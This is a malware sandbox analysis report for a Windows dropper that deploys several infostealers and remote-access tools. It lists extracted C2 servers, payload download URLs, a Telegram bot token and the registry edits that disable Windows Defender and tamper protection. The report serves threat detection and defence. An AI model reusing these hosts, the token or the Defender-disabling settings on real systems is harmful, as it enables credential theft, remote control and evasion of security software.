Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
10/03/2025, 11:39
Static task
static1
Behavioral task
behavioral1
Sample
040ff96d683274d16cbc8c7ca89c7748ce4dbec985b05044fb3cd4258dd9e732.exe
Resource
win10v2004-20250217-en
General
-
Target
040ff96d683274d16cbc8c7ca89c7748ce4dbec985b05044fb3cd4258dd9e732.exe
-
Size
5.4MB
-
MD5
5fd03d498e033fd6e114e3b5f958c9cc
-
SHA1
38e20f9cc54d469dec72dcd18a41d3470c779ef6
-
SHA256
040ff96d683274d16cbc8c7ca89c7748ce4dbec985b05044fb3cd4258dd9e732
-
SHA512
47b25f7ae0f0d9c754fc43b9720c57ada7e812e739caac1a7a6480eea199f771aa908881a5ec516577b0519f6e030a8d2fa4aab34afe28bdc9943b145ef5306f
-
SSDEEP
98304:QfHEHUtjLH5yRc30BYp6VmgaGpdqnmgkitaTvoCPhuq7ZdSQymYTR:m0Uthx30zwgn34tKd5aQ6
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://defaulemot.run/api
https://begindecafer.world/api
https://garagedrootz.top/api
https://modelshiverd.icu/api
https://arisechairedd.shop/api
https://jcatterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://sterpickced.digital/api
https://socialsscesforum.icu/api
https://hardswarehub.today/api
https://gadgethgfub.icu/api
https://hardrwarehaven.run/api
https://techmindzs.live/api
https://codxefusion.top/api
https://quietswtreams.life/api
https://techspherxe.top/api
https://earthsymphzony.today/api
https://catterjur.run/api
https://1sterpickced.digital/api
https://absoulpushx.life/api
https://narisechairedd.shop/api
https://2.sterpickced.digital/api
https://9garagedrootz.top/api
https://ksterpickced.digital/api
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
https://api.telegram.org/bot8007077483:AAHM4_PlNxkpckDEqg6ywAn9tdKAEoUNe4o/sendMessage?chat_id=5243921565
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
lumma
https://codxefusion.top/api
Signatures
-
Amadey family
-
Asyncrat family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/6496-2381-0x0000000000A10000-0x0000000000E60000-memory.dmp healer behavioral1/memory/6496-2382-0x0000000000A10000-0x0000000000E60000-memory.dmp healer behavioral1/memory/6496-2471-0x0000000000A10000-0x0000000000E60000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 650fe465b0.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 650fe465b0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 650fe465b0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 650fe465b0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 650fe465b0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 650fe465b0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 650fe465b0.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 650fe465b0.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 650fe465b0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 650fe465b0.exe -
Stealc family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 6 IoCs
resource yara_rule behavioral1/files/0x0007000000023d47-726.dat family_stormkitty behavioral1/files/0x000400000001e6a8-743.dat family_stormkitty behavioral1/memory/5840-859-0x0000000000350000-0x0000000000382000-memory.dmp family_stormkitty behavioral1/memory/5644-869-0x0000000000400000-0x00000000004EE000-memory.dmp family_stormkitty behavioral1/memory/4604-1172-0x0000000000400000-0x00000000004EE000-memory.dmp family_stormkitty behavioral1/memory/4604-1465-0x0000000000400000-0x00000000004EE000-memory.dmp family_stormkitty -
Stormkitty family
-
Xred family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x000400000001e6a8-743.dat family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 47caa411ec.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 650fe465b0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0320a92a1a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2z6185.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3i59G.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cuFIzyH.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempWKRN6JMW5JDKQAQZC5RJY3P67PPDZHKL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ OGLB96BFUO977CR17OZ9DP1ZT.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 79IPEWNE3VYWXIRFO98X.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9643d36073.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1C08r9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 162 5396 powershell.exe 169 3112 powershell.exe -
pid Process 2880 powershell.exe 5740 powershell.exe 368 powershell.exe 5396 powershell.exe 3112 powershell.exe -
Downloads MZ/PE file 20 IoCs
flow pid Process 95 1784 rapes.exe 95 1784 rapes.exe 95 1784 rapes.exe 95 1784 rapes.exe 115 4932 3i59G.exe 115 4932 3i59G.exe 115 4932 3i59G.exe 115 4932 3i59G.exe 115 4932 3i59G.exe 115 4932 3i59G.exe 202 1784 rapes.exe 202 1784 rapes.exe 202 1784 rapes.exe 38 1784 rapes.exe 169 3112 powershell.exe 181 5528 47caa411ec.exe 151 1784 rapes.exe 151 1784 rapes.exe 37 2644 2z6185.exe 162 5396 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (caf207c0cf87587b)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (caf207c0cf87587b)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=cbrelss.cc&p=8880&s=f0d8a388-6acf-41f6-9aee-626538ef9140&k=BgIAAACkAABSU0ExAAgAAAEAAQDF1rjU1uUITOrn2aT80pgJ%2bUERf68%2bMcyT4ZhEH%2fIC9Lcc3bLk68soTztG5GkqqIGJ1G8ZWNmVs3E41Z5zEd923KEkvc0ceVvzqwlR9b2k3Bo9tjZHgnvEUMSEcZquRQ9uNbopd42sjfxBvNmOYCj99Gp6Wzf66widwdejE6sndhlgLQEjQZdNQe9TccnJFZ3TJlfpqoPYe8f411kY6ZvU%2bxtpy%2f%2fpctP47SGAc6A7KMamHsefGXYW1bjXB4E1GOmSkmk8oEY1rtevw1S4ptM5ubN19VOk7dh%2bDcPymHnrXYQ%2fxTmDGedeOBAFbfsR5KbgE8mK1YqTyFR70fn%2fP4vc&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAQyMFYSPRwE2ncQ83q0fSJwAAAAACAAAAAAAQZgAAAAEAACAAAAC66OfLq79Drgva%2by3E%2bkm9WnkI6PfZu8T8bdj3RVg6MQAAAAAOgAAAAAIAACAAAADRMvLNuEZsif21v1IeIcdDCk5OygT%2b64J3md68yT%2fUQaAEAAB4wmhSh5zBvMx7HGQeFJCCsjmB8sWWhYkw2XlI774JOPvYuAzi6ZMt1bhvfw88GYJBBFhAICywh2qO%2fLReuPqkBHw4hoTMrcTcPXNnlyDLKAqCjx93%2bKgBpgC8MreTH9oRX7yD7vgkSNf%2bc0VrpfJWZdfHoTE2rd1rbz2yPNRFdpcosB1t5OzUmzBD6HiKiQQMdqjwSoCIzr6PynoBSoHHYWmVrX0nj3iWw5mXmWzXHLiL65226fJcU%2fVU4fkiT4AjdFlQ0SC8ep0OyA5JA1tp9fBTslwewsyCZi2A0%2f2P1QdRLbxhM8bgk5x%2btgOm9rFJqMi6fn4xdQk%2bpTfnhwSuIqSdzI0eleKsxl7PUhzczNeaDFRaxWhUtk0nEFUcdNZXi%2bTSj2YVCZZugJ9W3vp0miv8W%2f9rRlogESkcol6%2fdcBWXT%2ftxiqUNB03sdXjSoNRqaTWDInu%2bcBBuCKQKtACCGzolv0YdCBDAoFt0Vx0%2fii85GiZkO4SDa6r1s2C%2bBXJYx6KMfa2sJ74ElW2st14k4nx9jPDf41GsD7TrD%2bEkHMp4pc7QdMcBB330AXZADqmEn%2fIVg4swzzGJ2SaFlnmnV6rMElu5HPn3ZZWyyzFPq%2fDxwgdy%2bH5nyjeMVFMFlBKhiawf3KRU7dzyoqUImjUKhKKm6jUpnRqaDdAKjOCm%2bvYre75WW2E2KDP0Ux2ZhFgWUCz8isEuajIGtq0zfabplEHigdxMge7ZmT6SQ1t2bNFmKUNCv3s7w1HwuSrcWHGgJ8BGm%2bPODVrF6DOn2BOiSelv44zjflwFTgK8bfYMknAHpNTOmlLKZCtlgnBoLInlkhsB4KTfajX%2fulrhOIMY1ctkL09Mmz%2bY7KaIB17IX1T4R6V58ktm5PBAKBZG9Y%2bRbaOfiJCSQGFF0xptn6fJI5ZwIgYTqJK8Tj2KEM%2b8TAUxckCJDn4ii24KWmJalIe7TF3W74QUpGzW%2bx5CTY5X6UnZffRohIaEluVQKe%2bXVTAc4%2fBCEyFdOehm4o4RBMkIoykt8uH3MG2P%2fTMvfHkT3jorWKiAL7A1ERHymfNIewMImHdo4gAl1fC92xdV41FfmA%2bzvx7SOB846pQnqDFpPPmaLIeCneia4eWDQEl0Gy72TuPQrE3ZM%2fQZHBc8y12aMJI%2fUUDhmemcLs6U8DJlZEnB4JgPnF15chcG0cYm1p2AdzA6iyVz%2b4XrcSThbLJ0OGPb%2fFDq2ilTKCLwWvGiBSuL0G9WQmyELGah7kRLz3K5OoxiBfsYPV8ILUXo8JoCbzXqWbhNtCB9jDEYw4kaiFE%2bqC0V3983jHx3l0gbcQKVYBv48PXaZ84jze1uB3UQCG%2fIFpC4DEkxhq8o0VFE8q7UwdFpzNnsomWiIanLrEjaW548Q1ZYRuzgMZGcPePKodPX%2fWEKfN8tuhbzTgLvefJA%2fu3cFOShb9NwSiiPCI5l573w8QjrA02%2fIuIeKJ2pH5oroh1yd2I9zJqWDFmbArUIyUo4FB3mhndSyXNTDdi1Yi9YTWkZKQifuHkKjAA8d%2fICsl8Uk1BNW62Rp5ntccaUl392Y%2f6WC7%2fmcBHMUAAAABe2xwfPMhm35zkpry7WX4drkks00fM8MCrh7cPzypCw5y%2bgXFFmwbHRLjoWnDTff%2fMt6f6ZYwZ7BV95jDw6LYY&c=Labs&c=Labs&c=Labs&c=Labs&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1708 chrome.exe 5276 chrome.exe 5748 chrome.exe 4212 msedge.exe 6084 msedge.exe 6092 msedge.exe 1988 chrome.exe 2192 chrome.exe -
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 79IPEWNE3VYWXIRFO98X.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 79IPEWNE3VYWXIRFO98X.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 47caa411ec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1C08r9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3i59G.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cuFIzyH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempWKRN6JMW5JDKQAQZC5RJY3P67PPDZHKL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9643d36073.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OGLB96BFUO977CR17OZ9DP1ZT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OGLB96BFUO977CR17OZ9DP1ZT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempWKRN6JMW5JDKQAQZC5RJY3P67PPDZHKL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 650fe465b0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 650fe465b0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2z6185.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9643d36073.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0320a92a1a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1C08r9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2z6185.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3i59G.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0320a92a1a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cuFIzyH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 47caa411ec.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation Synaptics.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation 1C08r9.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation vKdwCHJ.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation ipKwUq9.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 32 IoCs
pid Process 2456 q5e62.exe 2100 1C08r9.exe 1784 rapes.exe 2644 2z6185.exe 3208 79IPEWNE3VYWXIRFO98X.exe 4932 3i59G.exe 6056 HHPgDSI.exe 2520 vKdwCHJ.exe 1952 cuFIzyH.exe 5644 ipKwUq9.exe 5840 ._cache_ipKwUq9.exe 4604 Synaptics.exe 3104 ._cache_Synaptics.exe 5844 rapes.exe 5892 iZ73hNr.exe 5980 iZ73hNr.exe 3512 P2SXMuh.exe 5520 P2SXMuh.exe 3360 ScreenConnect.ClientService.exe 5176 ScreenConnect.WindowsClient.exe 5416 ScreenConnect.WindowsBackstageShell.exe 2632 499ecee7cb.exe 452 ScreenConnect.WindowsClient.exe 1500 TempWKRN6JMW5JDKQAQZC5RJY3P67PPDZHKL.EXE 5528 47caa411ec.exe 3012 483d2fa8a0d53818306efeb32d3.exe 4132 9643d36073.exe 976 OGLB96BFUO977CR17OZ9DP1ZT.exe 4696 5a290de29e.exe 6496 650fe465b0.exe 7164 rapes.exe 7408 0320a92a1a.exe -
Identifies Wine through registry keys 2 TTPs 15 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 1C08r9.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine cuFIzyH.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine TempWKRN6JMW5JDKQAQZC5RJY3P67PPDZHKL.EXE Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 9643d36073.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 650fe465b0.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 3i59G.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 79IPEWNE3VYWXIRFO98X.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine OGLB96BFUO977CR17OZ9DP1ZT.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 0320a92a1a.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 2z6185.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 47caa411ec.exe -
Loads dropped DLL 24 IoCs
pid Process 2816 MsiExec.exe 5416 rundll32.exe 5416 rundll32.exe 5416 rundll32.exe 5416 rundll32.exe 5416 rundll32.exe 5416 rundll32.exe 5416 rundll32.exe 5416 rundll32.exe 5416 rundll32.exe 4932 3i59G.exe 4932 3i59G.exe 5456 MsiExec.exe 5796 MsiExec.exe 3360 ScreenConnect.ClientService.exe 3360 ScreenConnect.ClientService.exe 3360 ScreenConnect.ClientService.exe 3360 ScreenConnect.ClientService.exe 3360 ScreenConnect.ClientService.exe 3360 ScreenConnect.ClientService.exe 3360 ScreenConnect.ClientService.exe 3360 ScreenConnect.ClientService.exe 3360 ScreenConnect.ClientService.exe 3360 ScreenConnect.ClientService.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 650fe465b0.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 650fe465b0.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 040ff96d683274d16cbc8c7ca89c7748ce4dbec985b05044fb3cd4258dd9e732.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" q5e62.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5a290de29e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10165990101\\5a290de29e.exe" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" ipKwUq9.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\499ecee7cb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10165740101\\499ecee7cb.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10165750121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\47caa411ec.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10165970101\\47caa411ec.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9643d36073.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10165980101\\9643d36073.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\650fe465b0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10166000101\\650fe465b0.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 14 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\f51ce65e43e0d0df799cde3f2477c9f6\Admin@FRAVVDAE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini ._cache_Synaptics.exe File created C:\Users\Admin\AppData\Local\b83720fa57fc44bf7e50dadcdfda3d1b\Admin@FRAVVDAE_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini ._cache_ipKwUq9.exe File opened for modification C:\Users\Admin\AppData\Local\b83720fa57fc44bf7e50dadcdfda3d1b\Admin@FRAVVDAE_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini ._cache_ipKwUq9.exe File created C:\Users\Admin\AppData\Local\b83720fa57fc44bf7e50dadcdfda3d1b\Admin@FRAVVDAE_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini ._cache_ipKwUq9.exe File opened for modification C:\Users\Admin\AppData\Local\f51ce65e43e0d0df799cde3f2477c9f6\Admin@FRAVVDAE_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini ._cache_Synaptics.exe File created C:\Users\Admin\AppData\Local\f51ce65e43e0d0df799cde3f2477c9f6\Admin@FRAVVDAE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini ._cache_Synaptics.exe File created C:\Users\Admin\AppData\Local\f51ce65e43e0d0df799cde3f2477c9f6\Admin@FRAVVDAE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini ._cache_Synaptics.exe File created C:\Users\Admin\AppData\Local\f51ce65e43e0d0df799cde3f2477c9f6\Admin@FRAVVDAE_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini ._cache_Synaptics.exe File created C:\Users\Admin\AppData\Local\f51ce65e43e0d0df799cde3f2477c9f6\Admin@FRAVVDAE_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini ._cache_Synaptics.exe File created C:\Users\Admin\AppData\Local\b83720fa57fc44bf7e50dadcdfda3d1b\Admin@FRAVVDAE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini ._cache_ipKwUq9.exe File created C:\Users\Admin\AppData\Local\b83720fa57fc44bf7e50dadcdfda3d1b\Admin@FRAVVDAE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini ._cache_ipKwUq9.exe File created C:\Users\Admin\AppData\Local\b83720fa57fc44bf7e50dadcdfda3d1b\Admin@FRAVVDAE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini ._cache_ipKwUq9.exe File created C:\Users\Admin\AppData\Local\b83720fa57fc44bf7e50dadcdfda3d1b\Admin@FRAVVDAE_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini ._cache_ipKwUq9.exe File created C:\Users\Admin\AppData\Local\f51ce65e43e0d0df799cde3f2477c9f6\Admin@FRAVVDAE_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini ._cache_Synaptics.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
